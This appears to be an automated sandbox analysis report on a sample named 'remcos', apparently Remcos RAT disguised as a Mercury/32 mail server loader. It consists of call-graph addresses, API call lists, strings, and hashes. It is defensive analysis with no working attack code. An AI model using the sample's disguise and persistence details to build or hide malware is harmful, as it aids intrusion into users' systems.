7647 403155 7633->7647 7637 4033cb 7636->7637 7641 4033e1 7636->7641 7653 40259a 7636->7653 7660 40220e 7637->7660 7639 40a6c4 32 API calls 7639->7646 7643 403155 32 API calls 7643->7646 7645 404164 32 API calls 7645->7646 7646->7639 7646->7641 7646->7643 7646->7645 7664 4032ef 7646->7664 7668 402c78 7646->7668 7672 402e8c 7646->7672 7650 403184 7647->7650 7648 4032b9 7648->7636 7650->7648 7651 40a6c4 32 API calls 7650->7651 7652 402d2c 32 API calls 7650->7652 7707 403cf0 7650->7707 7651->7650 7652->7650 7796 4043cd 7653->7796 7656 4025ba 7656->7636 7657 4043cd 32 API calls 7658 4025e2 7657->7658 7658->7656 7659 4043cd 32 API calls 7658->7659 7659->7656 7663 402214 7660->7663 7661 40a9f0 32 API calls 7662 40227e 7661->7662 7662->7641 7663->7661 7665 4032ff 7664->7665 7666 40259a 32 API calls 7665->7666 7667 403306 7665->7667 7666->7665 7667->7646 7669 402c85 7668->7669 7816 4024fe RtlUnwind 7669->7816 7671 402cb3 7671->7646 7673 402ea0 7672->7673 7674 402eb4 7672->7674 7675 40a6c4 32 API calls 7673->7675 7676 402ed3 7674->7676 7677 40a6c4 32 API calls 7674->7677 7675->7674 7679 40a6c4 32 API calls 7676->7679 7681 402ef0 7676->7681 7677->7676 7678 403147 7678->7646 7679->7681 7680 403036 7682 403040 7680->7682 7683 4030e2 7680->7683 7681->7678 7681->7680 7684 402f80 7681->7684 7692 402f55 7681->7692 7685 40305c 7682->7685 7689 40a6c4 32 API calls 7682->7689 7691 40a6c4 32 API calls 7683->7691 7683->7692 7686 402f84 7684->7686 7687 402faa 7684->7687 7690 40419b 32 API calls 7685->7690 7695 40a6c4 32 API calls 7686->7695 7699 402f9e 7686->7699 7688 402fc2 7687->7688 7693 40a6c4 32 API calls 7687->7693 7696 40a6c4 32 API calls 7688->7696 7688->7699 7689->7685 7694 403068 7690->7694 7691->7692 7692->7678 7700 402cb7 32 API calls 7692->7700 7693->7688 7698 40307b 7694->7698 7702 404a90 32 API calls 7694->7702 7695->7699 7696->7699 7697 40419b 32 API calls 7701 402ff3 7697->7701 7698->7692 7703 40a6c4 32 API calls 7698->7703 7706 4030ab 7698->7706 7699->7697 7700->7678 7701->7692 7817 404a90 7701->7817 7702->7698 7703->7706 7704 40265c 32 API calls 7704->7692 7706->7704 7708 403d0b 7707->7708 7714 403d04 7707->7714 7709 403d46 7708->7709 7711 40a6c4 32 API calls 7708->7711 7713 403d8d 7708->7713 7712 403d68 7709->7712 7716 40a6c4 32 API calls 7709->7716 7710 403da7 7710->7714 7715 40a6c4 32 API calls 7710->7715 7711->7709 7712->7713 7717 40a6c4 32 API calls 7712->7717 7713->7710 7720 403de1 7713->7720 7714->7650 7715->7714 7716->7712 7717->7713 7718 40a6c4 32 API calls 7722 403df0 7718->7722 7719 40a6c4 32 API calls 7719->7720 7720->7719 7720->7722 7729 403c74 7720->7729 7722->7714 7722->7718 7725 409888 4 API calls 7722->7725 7726 4028be 32 API calls 7722->7726 7728 403c74 32 API calls 7722->7728 7735 403b50 7722->7735 7751 4038b6 7722->7751 7779 409898 7722->7779 7725->7722 7726->7722 7728->7722 7730 403c88 7729->7730 7732 403c9c 7729->7732 7731 40a6c4 32 API calls 7730->7731 7731->7732 7733 40a6c4 32 API calls 7732->7733 7734 403caa 7732->7734 7733->7734 7734->7720 7736 403b65 7735->7736 7737 403b79 7735->7737 7738 40a6c4 32 API calls 7736->7738 7739 403b99 7737->7739 7740 40a6c4 32 API calls 7737->7740 7738->7737 7741 40a6c4 32 API calls 7739->7741 7743 403bc0 7739->7743 7740->7739 7741->7743 7742 403bfd 7744 403c21 7742->7744 7746 40a6c4 32 API calls 7742->7746 7743->7742 7745 40a6c4 32 API calls 7743->7745 7747 403c46 7744->7747 7749 4038b6 32 API calls 7744->7749 7745->7742 7746->7744 7748 403c6d 7747->7748 7750 4038b6 32 API calls 7747->7750 7748->7722 7749->7747 7750->7747 7752 4038cb 7751->7752 7754 4038df 7751->7754 7753 40a6c4 32 API calls 7752->7753 7753->7754 7755 4038fe 7754->7755 7756 40391a 7754->7756 7782 403774 7755->7782 7759 40a6c4 32 API calls 7756->7759 7760 403932 7756->7760 7758 403912 7758->7722 7759->7760 7761 40a6c4 32 API calls 7760->7761 7763 4039ae 7760->7763 7764 403980 7760->7764 7761->7760 7762 40a6c4 32 API calls 7762->7763 7763->7762 7765 4039f5 7763->7765 7771 403a4e 7763->7771 7792 40386b 7764->7792 7767 40386b 32 API calls 7765->7767 7769 403a13 7767->7769 7768 40a6c4 32 API calls 7768->7771 7769->7758 7772 40386b 32 API calls 7769->7772 7770 403abc 7773 403b50 32 API calls 7770->7773 7774 4038b6 32 API calls 7770->7774 7775 403afd 7770->7775 7771->7768 7771->7770 7772->7758 7773->7770 7774->7770 7776 40386b 32 API calls 7775->7776 7777 403b18 7776->7777 7777->7758 7778 40386b 32 API calls 7777->7778 7778->7758 7780 409888 4 API calls 7779->7780 7781 4098a4 7780->7781 7781->7722 7783 403790 7782->7783 7784 4037aa 7783->7784 7785 40a6c4 32 API calls 7783->7785 7786 40a6c4 32 API calls 7784->7786 7788 4037c7 7784->7788 7785->7784 7786->7788 7787 4037f9 7789 40276a 32 API calls 7787->7789 7788->7787 7790 40a6c4 32 API calls 7788->7790 7791 403829 7789->7791 7790->7787 7791->7758 7793 40387c 7792->7793 7794 4038b1 7793->7794 7795 4038b6 32 API calls 7793->7795 7794->7758 7795->7793 7797 4043dd 7796->7797 7798 40419b 32 API calls 7797->7798 7799 4025b3 7797->7799 7800 4044a1 7798->7800 7799->7656 7799->7657 7800->7799 7802 404276 7800->7802 7803 404288 7802->7803 7804 40429c 7802->7804 7806 40a6c4 32 API calls 7803->7806 7805 4042bc 7804->7805 7807 40a6c4 32 API calls 7804->7807 7808 40a6c4 32 API calls 7805->7808 7811 4042dc 7805->7811 7806->7804 7807->7805 7808->7811 7809 404326 7809->7799 7810 40419b 32 API calls 7810->7811 7811->7809 7811->7810 7813 404356 7811->7813 7814 404276 32 API calls 7811->7814 7812 40419b 32 API calls 7812->7813 7813->7809 7813->7812 7815 404276 32 API calls 7813->7815 7814->7811 7815->7813 7816->7671 7818 404aa6 7817->7818 7824 404aa1 7817->7824 7825 4049ee 7818->7825 7821 4049ee 32 API calls 7822 404ad8 7821->7822 7823 40a6c4 32 API calls 7822->7823 7822->7824 7823->7824 7824->7692 7826 404a00 7825->7826 7830 404a14 7825->7830 7827 40a6c4 32 API calls 7826->7827 7827->7830 7828 40419b 32 API calls 7828->7830 7829 404a1d 7829->7821 7829->7824 7830->7828 7830->7829 7831 4049ee 32 API calls 7830->7831 7831->7830 7832 40593b 7835 4057ed 7832->7835 7833 40609b 7834 4073c8 WideCharToMultiByte 7834->7835 7835->7833 7835->7834 7836 40743c 7837 40744f 7836->7837 7838 407464 7837->7838 7839 407525 7837->7839 7841 407455 7837->7841 7838->7841 7842 40749a MultiByteToWideChar 7838->7842 7840 40753a MultiByteToWideChar 7839->7840 7839->7841 7840->7841 7842->7841 7843 4074c0 GetLastError 7842->7843 7843->7841 7845 4074d2 MultiByteToWideChar 7843->7845 7845->7841 7846 40333c 7847 403381 7846->7847 7857 4033f1 7846->7857 7848 403155 32 API calls 7847->7848 7849 40338b 7848->7849 7852 4033cb 7849->7852 7854 4033e1 7849->7854 7855 40259a 32 API calls 7849->7855 7850 40a6c4 32 API calls 7850->7857 7851 4032ef 32 API calls 7851->7857 7853 40220e 32 API calls 7852->7853 7853->7854 7855->7849 7856 402c78 RtlUnwind 7856->7857 7857->7850 7857->7851 7857->7854 7857->7856 7858 403155 32 API calls 7857->7858 7859 402e8c 32 API calls 7857->7859 7860 404164 32 API calls 7857->7860 7858->7857 7859->7857 7860->7857 7861 4048c0 7862 40496c 7861->7862 7863 4048df 7861->7863 7864 40490e 7862->7864 7867 402bf5 33 API calls 7862->7867 7865 404902 7863->7865 7866 40a6c4 32 API calls 7863->7866 7865->7864 7868 40419b 32 API calls 7865->7868 7866->7865 7867->7864 7869 40491c 7868->7869 7869->7864 7870 40419b 32 API calls 7869->7870 7871 404930 7870->7871 7872 40494f 7871->7872 7875 404659 7871->7875 7872->7864 7874 404659 32 API calls 7872->7874 7874->7862 7876 404677 7875->7876 7877 404694 7876->7877 7878 40a6c4 32 API calls 7876->7878 7879 4046ba 7877->7879 7880 40a6c4 32 API calls 7877->7880 7878->7877 7881 4046e0 7879->7881 7884 40a6c4 32 API calls 7879->7884 7880->7879 7882 40471d 7881->7882 7885 40419b 32 API calls 7881->7885 7883 40473c 7882->7883 7887 40419b 32 API calls 7882->7887 7892 404724 7882->7892 7888 40a6c4 32 API calls 7883->7888 7896 404757 7883->7896 7884->7881 7886 4046f4 7885->7886 7889 40470f 7886->7889 7890 40a6c4 32 API calls 7886->7890 7887->7883 7888->7896 7891 40419b 32 API calls 7889->7891 7890->7889 7891->7882 7892->7872 7893 40419b 32 API calls 7893->7896 7894 40a6c4 32 API calls 7894->7896 7895 404659 32 API calls 7895->7896 7896->7892 7896->7893 7896->7894 7896->7895 7900 4010c1 TlsGetValue 7901 4010d8 LocalFree 7900->7901 7902 4010de 7900->7902 7901->7902 7903 40acc2 7904 40acd7 7903->7904 7905 409ee4 4 API calls 7904->7905 7906 40ace2 7905->7906 7907 409ee4 4 API calls 7906->7907 7908 40acee 7907->7908 7916 4021c5 7917 4021ca 7916->7917 7918 402db4 32 API calls 7916->7918 7919 40a9f0 32 API calls 7917->7919 7918->7917 7920 4021cf 7919->7920 7921 4054d0 7922 4057b8 WideCharToMultiByte 7921->7922 7923 4054ef 7922->7923 7924 4053d0 7926 4053db 7924->7926 7925 405378 9 API calls 7925->7926 7926->7925 7928 40540b 7926->7928 7929 404bec 7926->7929 7930 4067f8 GetFileAttributesA 7929->7930 7931 40680c 7930->7931 7934 406814 7930->7934 7932 406780 10 API calls 7931->7932 7935 406811 7932->7935 7933 406830 7933->7926 7934->7933 7936 40a724 9 API calls 7934->7936 7935->7926 7937 406824 7936->7937 7937->7926 7193 40bbd4 7198 40aac8 7193->7198 7195 40bc60 GetTimeZoneInformation 7197 40bcb5 7195->7197 7196 40bbe8 7196->7195 7196->7197 7199 40aad7 7198->7199 7200 40aade 7199->7200 7204 40ae60 7199->7204 7200->7196 7202 40aae7 7207 40ae70 7202->7207 7210 40b8cc EnterCriticalSection 7204->7210 7206 40ae6b 7206->7202 7211 40b8dc LeaveCriticalSection 7207->7211 7209 40ae7b 7209->7200 7210->7206 7211->7209 7941 4088d4 7942 4088e6 7941->7942 7943 40890a 7941->7943 7944 407bd0 9 API calls 7942->7944 7945 407bd0 9 API calls 7943->7945 7946 408903 7943->7946 7944->7946 7945->7946 7950 4051dc 7951 405630 32 API calls 7950->7951 7952 4051eb 7951->7952 7953 4068e0 32 API calls 7952->7953 7956 4051fa 7953->7956 7954 4056f8 4 API calls 7955 405260 7954->7955 7957 4068e0 32 API calls 7956->7957 7958 40523b 7956->7958 7959 405226 7957->7959 7958->7954 7959->7958 7960 4068e0 32 API calls 7959->7960 7960->7958 7965 4067dc 7966 406794 11 API calls 7965->7966 7967 4067f0 7966->7967 7968 4010e0 7971 4010c0 7968->7971 7972 4010c9 TlsGetValue 7971->7972 7973 4010de TlsFree 7971->7973 7972->7973 7974 4010d8 LocalFree 7972->7974 7974->7973 7975 4060e0 7976 405610 EnterCriticalSection 7975->7976 7980 4060e7 7976->7980 7977 406110 7978 405620 LeaveCriticalSection 7977->7978 7979 406115 7978->7979 7980->7977 7981 404c74 33 API calls 7980->7981 7981->7980 7988 404bf1 7989 404c09 7988->7989 7991 404c12 7988->7991 7990 409ee4 4 API calls 7989->7990 7990->7991 7992 409ff8 7 API calls 7991->7992 7993 404c44 7991->7993 7992->7993 7994 4054f4 7995 40b868 32 API calls 7994->7995 7996 405509 7995->7996 7997 404bf4 7 API calls 7996->7997 7998 40557a 7997->7998 7999 404bf4 7 API calls 7998->7999 8000 4055b0 7999->8000 8001 4072fc 8002 407312 8001->8002 8003 40730e 8001->8003 8003->8002 8004 407397 MultiByteToWideChar 8003->8004 8005 407359 8003->8005 8004->8002 8005->8002 8007 407368 MultiByteToWideChar 8005->8007 8007->8002 8008 4045fc 8009 40460d 8008->8009 8012 40462a 8008->8012 8011 402bf5 33 API calls 8009->8011 8010 40464a 8011->8012 8012->8010 8013 40a6c4 32 API calls 8012->8013 8013->8010 8017 407280 8018 407296 8017->8018 8019 40728d 8017->8019 8019->8018 8020 4072d3 MultiByteToWideChar 8019->8020 8021 4072a7 8019->8021 8024 4072ee 8020->8024 8022 4072c7 8021->8022 8023 4072ac MultiByteToWideChar 8021->8023 8023->8022 8025 40ae80 8026 40ae89 8025->8026 8028 40ae8f 8025->8028 8029 409ee4 4 API calls 8026->8029 8027 40ae9f 8028->8027 8030 409ee4 4 API calls 8028->8030 8029->8028 8030->8027 8031 406b80 DeleteFileW 8032 406b93 8031->8032 8033 406b8f 8031->8033 8034 406780 10 API calls 8032->8034 8034->8033 8035 404582 8038 40455f 8035->8038 8039 40419b 32 API calls 8038->8039 8040 404574 8039->8040 8041 407084 GetDateFormatA 8042 4070fb 8041->8042 8043 4070ff GetDateFormatA 8041->8043 8043->8042 7192 40b690 TlsFree TlsFree 8051 40109d 8052 4010a6 TlsAlloc 8051->8052 8053 4010bf 8051->8053 8054 4010b5 8052->8054 8055 40105a 8052->8055 8056 401059 2 API calls 8054->8056 8057 40109c 8055->8057 8058 401076 LocalAlloc 8055->8058 8059 401059 2 API calls 8055->8059 8056->8053 8060 401090 TlsSetValue 8058->8060 8061 401086 8058->8061 8059->8058 8060->8057 8062 401059 2 API calls 8061->8062 8062->8060 8063 4023a0 LeaveCriticalSection 8064 402ba0 8065 40212e 32 API calls 8064->8065 8066 402ba5 8065->8066 8067 402bb0 8066->8067 8068 402db4 32 API calls 8066->8068 8069 402bbe RaiseException 8067->8069 8068->8067 8076 4075a4 8077 4075b9 8076->8077 8078 4075d0 8077->8078 8079 4076f3 8077->8079 8082 4075bf 8077->8082 8080 40761f WideCharToMultiByte 8078->8080 8078->8082 8081 40770b WideCharToMultiByte 8079->8081 8079->8082 8083 40764c 8080->8083 8081->8082 8083->8082 8084 407660 GetLastError 8083->8084 8084->8082 8086 407672 8084->8086 8085 407677 WideCharToMultiByte 8085->8082 8085->8086 8086->8082 8086->8085 8090 40aaa8 8091 40aa04 5 API calls 8090->8091 8092 40aab3 8091->8092 8096 4049a8 8097 4049ac 8096->8097 8098 402bf5 33 API calls 8097->8098 8099 4049d6 8097->8099 8098->8099 8106 4065b4 8107 40b868 32 API calls 8106->8107 8108 4065c9 SetHandleCount 8107->8108 8109 4065e1 8108->8109 8110 4065e7 GetStartupInfoA 8108->8110 8109->8110 8115 406612 8110->8115 8111 406700 8112 4066b3 GetStdHandle GetStdHandle GetStdHandle 8113 4066de 8112->8113 8113->8111 8116 406898 8113->8116 8115->8111 8115->8112 8117 4068a7 8116->8117 8118 4068ac GetFileType 8116->8118 8117->8113 8118->8113 8119 40b7b4 TlsGetValue 8120 40b7d0 8119->8120 8123 40b7d6 8119->8123 8125 40b76c 8120->8125 8122 40b862 8123->8122 8124 409ee4 VirtualFree VirtualFree EnterCriticalSection LeaveCriticalSection 8123->8124 8124->8123 8130 40b8cc EnterCriticalSection 8125->8130 8127 40b77e 8131 40b8dc LeaveCriticalSection 8127->8131 8129 40b799 8129->8123 8130->8127 8131->8129 8141 4055b8 8142 405610 EnterCriticalSection 8141->8142 8143 4055c3 8142->8143 8144 4055d9 8143->8144 8145 404d14 32 API calls 8143->8145 8148 404d14 32 API calls 8144->8148 8153 4055fd 8144->8153 8147 4055cf 8145->8147 8146 405620 LeaveCriticalSection 8149 40560d 8146->8149 8150 409ee4 4 API calls 8147->8150 8151 4055f3 8148->8151 8150->8144 8152 409ee4 4 API calls 8151->8152 8152->8153 8153->8146 8154 4023b8 8155 4023d2 8154->8155 8156 4023d9 8154->8156 8157 4023f7 8156->8157 8164 4024fe RtlUnwind 8156->8164 8162 40a87c 32 API calls 8157->8162 8163 402412 8157->8163 8159 4023f2 8160 40212e 32 API calls 8159->8160 8160->8157 8161 402455 UnhandledExceptionFilter 8161->8155 8162->8163 8163->8155 8163->8161 8164->8159 8171 4031bd 8175 403184 8171->8175 8172 4032b9 8173 403cf0 32 API calls 8173->8175 8174 40a6c4 32 API calls 8174->8175 8175->8172 8175->8173 8175->8174 8176 402d2c 32 API calls 8175->8176 8176->8175

                                                                                        Executed Functions

                                                                                        Function 0040128D Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 101registryfiletimeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • RegOpenKeyA.ADVAPI32(80000000,Software\Mercury32,?), ref: 004012B3
                                                                                        • RegQueryValueA.ADVAPI32(?,BaseDir,?,?), ref: 004012DA
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004012E6
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004012F3
                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 0040133C
                                                                                        • FindClose.KERNEL32(00000000,?,?), ref: 00401347
                                                                                        • GetLocalTime.KERNEL32(?), ref: 00401392
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_400000_remcos.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$Find$FileFirstLocalOpenQueryTimeValue
                                                                                        • String ID: %02d-%02d-%02d.%02d%02d: %s$%s\Loader.Log$BaseDir$C:\ProgramData\Remcos$Software\Mercury32$r+t
                                                                                        • API String ID: 3460814986-900928516
                                                                                        • Opcode ID: 0fafee7130c1bb9ded1b2921e2bb797deb568f4e708ab1a19d06aa523d814d83
                                                                                        • Instruction ID: dfd861be5d27ab76580011db74593427ab2e3e9b6d1f87f4f499b649e2b96ce4
                                                                                        • Opcode Fuzzy Hash: 0fafee7130c1bb9ded1b2921e2bb797deb568f4e708ab1a19d06aa523d814d83
                                                                                        • Instruction Fuzzy Hash: C231A9B1D00218A6DB2197A1DC42FEE727C9B58704F1005BFBA45B11D2EBBC9B8497AC
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004018AE Relevance: 70.3, APIs: 20, Strings: 20, Instructions: 297stringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 4018ae-4018c8 1 4018d6-40190c GetModuleFileNameA call 401275 call 402044 0->1 2 4018ca-4018d1 call 401612 0->2 10 401911-40196f call 401ff4 call 40128d call 40bffe lstrlenA CharLowerBuffA 1->10 11 40190e 1->11 7 401ca0-401ca6 2->7 18 40198a-40198d 10->18 11->10 19 401971-401984 call 401e1c 18->19 20 40198f-4019a4 OpenSemaphoreA 18->20 28 401986 19->28 29 401989 19->29 22 4019d1-4019db call 40bdf4 20->22 23 4019a6-4019cc CloseHandle call 40bff8 call 40128d 20->23 31 4019e1-401a00 call 40bffe 22->31 23->7 28->29 29->18 36 401a02-401a08 31->36 37 401a2a-401acb call 401d3c * 4 CreateProcessA 31->37 36->37 38 401a0a-401a25 lstrcatA * 2 36->38 47 401b00-401b11 CloseHandle * 2 37->47 48 401acd-401af3 GetLastError call 4054ac call 40128d 37->48 38->37 50 401b16-401b2c OpenProcess 47->50 59 401af8-401afb 48->59 52 401b43-401b4f GetExitCodeProcess 50->52 53 401b2e-401b3a GetLastError 50->53 57 401b51-401b5d GetLastError 52->57 58 401b66-401b73 CloseHandle 52->58 55 401bb0-401bde call 40bffe call 404bec 53->55 56 401b3c-401b3e ExitProcess 53->56 71 401c93-401c9e call 40128d 55->71 72 401be4-401c12 call 40bffe call 404bec 55->72 57->55 61 401b5f-401b61 ExitProcess 57->61 58->55 62 401b75-401b8d SleepEx call 40bdf4 58->62 59->7 62->50 67 401b8f-401b91 62->67 69 401b93-401b9d call 40128d 67->69 70 401b9e-401bab 67->70 69->70 70->50 71->7 81 401c14-401c2d call 405414 call 40128d 72->81 82 401c2f-401c39 call 40128d 72->82 88 401c3a-401c4d SleepEx 81->88 82->88 88->31 90 401c53-401c57 88->90 91 401c66-401c78 call 40128d call 401612 90->91 92 401c59-401c64 call 40128d 90->92 91->71 99 401c7a-401c8e call 40128d 91->99 92->71 99->31
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000100), ref: 004018E5
                                                                                        • lstrlenA.KERNEL32(?), ref: 00401957
                                                                                        • CharLowerBuffA.USER32(?,00000000,?), ref: 00401964
                                                                                        • OpenSemaphoreA.KERNEL32(001F0003,00000000,?), ref: 0040199D
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004019A7
                                                                                          • Part of subcall function 00401612: RegOpenKeyA.ADVAPI32(80000000,?,?), ref: 0040163A
                                                                                        Strings
                                                                                        • Recovery complete - attempting to restart Mercury., xrefs: 00401C7A
                                                                                        • Too many abnormal terminations in time period - attempting recovery., xrefs: 00401C66
                                                                                        • D, xrefs: 00401A77
                                                                                        • C:\ProgramData\Remcos, xrefs: 0040191D
                                                                                        • :\/, xrefs: 00401975
                                                                                        • %s\m32-ssu.run, xrefs: 00401BEB
                                                                                        • There is already a copy of Mercury/32 running from this directory.Only one copy may be run at a time from any given install directory., xrefs: 004019B3
                                                                                        • Mercury/32 Loader shutting down., xrefs: 00401C93
                                                                                        • Mercury/32 Loader Started, xrefs: 0040192A
                                                                                        • Multiple sessions from the same install directory detected - terminating, xrefs: 004019BF
                                                                                        • %s\m32.run, xrefs: 00401BB7
                                                                                        • W, xrefs: 00401B59
                                                                                        • Normal operation restored - resetting counters., xrefs: 00401B93
                                                                                        • Loader encountered Windows error %d creating Mercury/32 process., xrefs: 00401AD8
                                                                                        • Mercury/32 Loader Error, xrefs: 004019AE
                                                                                        • %s\mercury.exe -E, xrefs: 004019E8
                                                                                        • Abnormal terminations continued after attempted recovery - exiting., xrefs: 00401C59
                                                                                        • mercury32.pmail.com.run.%.60s, xrefs: 0040193C
                                                                                        • Restarting Mercury after apparent abnormal termination, xrefs: 00401C2F
                                                                                        • Restarting Mercury after scheduled daily exit, xrefs: 00401C21
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_400000_remcos.jbxd
                                                                                        Similarity
                                                                                        • API ID: Open$BuffCharCloseFileHandleLowerModuleNameSemaphorelstrlen
                                                                                        • String ID: %s\m32-ssu.run$%s\m32.run$%s\mercury.exe -E$:\/$Abnormal terminations continued after attempted recovery - exiting.$C:\ProgramData\Remcos$D$Loader encountered Windows error %d creating Mercury/32 process.$Mercury/32 Loader Error$Mercury/32 Loader Started$Mercury/32 Loader shutting down.$Multiple sessions from the same install directory detected - terminating$Normal operation restored - resetting counters.$Recovery complete - attempting to restart Mercury.$Restarting Mercury after apparent abnormal termination$Restarting Mercury after scheduled daily exit$There is already a copy of Mercury/32 running from this directory.Only one copy may be run at a time from any given install directory.$Too many abnormal terminations in time period - attempting recovery.$W$mercury32.pmail.com.run.%.60s
                                                                                        • API String ID: 527459832-1550949876
                                                                                        • Opcode ID: 21806626913b0df371d69415627cef80720bedf28f1a3404ab7f6c3db0ba0880
                                                                                        • Instruction ID: 9b5fbd67cbc3e190377a54b581c7df8cf1cf74e5fc47f7b393678a9f4ffd1dd2
                                                                                        • Opcode Fuzzy Hash: 21806626913b0df371d69415627cef80720bedf28f1a3404ab7f6c3db0ba0880
                                                                                        • Instruction Fuzzy Hash: 82A19AB19443196ADB10E7A18C43FEA73789F44704F1045BFF644B61D2EBBC96888EAD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401000 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 160COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 128 401000-40101d 129 401024-40b536 call 40229f GetModuleHandleA call 40799c call 407e34 call 404e08 call 4024e4 GetEnvironmentStrings GetCommandLineA call 40ab2c call 40b360 128->129 130 40101f-401022 128->130 146 40b580-40b593 call 40b368 129->146 147 40b538-40b542 129->147 130->129 152 40b595-40b599 146->152 153 40b57e 146->153 148 40b546-40b555 call 40b368 147->148 157 40b544 148->157 158 40b557-40b55f 148->158 155 40b59b-40b5a1 152->155 156 40b5fe-40b61e call 40aa78 152->156 153->146 159 40b5a4-40b5a8 155->159 173 40b61f-40b625 156->173 157->148 160 40b575-40b57a 158->160 161 40b5a3 159->161 162 40b5aa-40b5ac 159->162 164 40b561-40b572 160->164 165 40b57c 160->165 161->159 162->161 166 40b5ae-40b5b1 162->166 164->160 165->146 168 40b5b3-40b5b6 166->168 169 40b5b8-40b5ba 166->169 172 40b5bd-40b5c1 168->172 169->172 174 40b5c3-40b5c5 172->174 175 40b5cb-40b5ce 172->175 174->175 176 40b5c7-40b5c9 174->176 177 40b5d0-40b5d1 175->177 178 40b5d4-40b5d8 175->178 176->175 181 40b5bc 176->181 177->178 179 40b5da-40b5dc 178->179 180 40b5de-40b5e0 178->180 179->180 182 40b5d3 179->182 180->182 183 40b5e2-40b5f6 GetModuleHandleA call 4018ae call 40aa78 180->183 181->172 182->178 186 40b5fb-40b5fc 183->186 186->173
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,0040D0D4), ref: 00401035
                                                                                        • GetEnvironmentStrings.KERNEL32 ref: 0040B514
                                                                                        • GetCommandLineA.KERNEL32 ref: 0040B51E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_400000_remcos.jbxd
                                                                                        Similarity
                                                                                        • API ID: CommandEnvironmentHandleLineModuleStrings
                                                                                        • String ID: C:\ProgramData\Remcos$`6g
                                                                                        • API String ID: 1584138308-4140288315
                                                                                        • Opcode ID: 5af8f9c36be296b6b91c95da3a50d919bc7001994e3f0b2d056ede415890b488
                                                                                        • Instruction ID: 1e125b975a801eda77775a79630f441c36246d9b4f70de590b5ee850b0935413
                                                                                        • Opcode Fuzzy Hash: 5af8f9c36be296b6b91c95da3a50d919bc7001994e3f0b2d056ede415890b488
                                                                                        • Instruction Fuzzy Hash: C8413670904304ABDB209F69DC86B6637A5EB4530CF2441BBE645BB3D2DB789842C7DE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040AE18 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 263 40ae18-40ae1e call 409ff8 265 40ae23-40ae2e 263->265 266 40ae30-40ae3a call 40a87c 265->266 267 40ae3b-40ae4e GetModuleFileNameA 265->267 266->267
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,01F720A0,000000FF), ref: 0040AE48
                                                                                        Strings
                                                                                        • Out of memory in _setargv0, xrefs: 0040AE30
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_400000_remcos.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName
                                                                                        • String ID: Out of memory in _setargv0
                                                                                        • API String ID: 514040917-2942948061
                                                                                        • Opcode ID: 8849eb4b992d70840f09de2f41c067b23d30e3319a69c04082766a08399211d7
                                                                                        • Instruction ID: bde238995ca32203eb0991386ad726e6e3c65fe9e4cb5cff42fc1c95905b8154
                                                                                        • Opcode Fuzzy Hash: 8849eb4b992d70840f09de2f41c067b23d30e3319a69c04082766a08399211d7
